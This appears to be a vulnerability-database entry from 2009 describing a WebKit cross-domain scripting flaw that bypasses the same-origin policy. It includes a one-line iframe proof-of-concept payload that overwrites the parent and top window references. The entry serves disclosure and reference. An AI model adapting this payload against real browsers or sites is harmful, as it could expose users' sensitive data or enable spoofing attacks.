Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackGareth HayesEXPLOITPACK:EDD554F4AA8B74A5D7704A13B037498A
HistoryMay 19, 2009 - 12:00 a.m.

WebKit - parenttop Cross Domain Scripting

2009-05-1900:00:00
Gareth Hayes
8
JSON

WebKit - parenttop Cross Domain Scripting

source: https://www.securityfocus.com/bid/35441/info

WebKit is prone to a cross-domain scripting vulnerability.

A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or launch spoofing attacks against other sites. Other attacks are also possible. 

<iframe src="http://www.example.com/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe>
JSON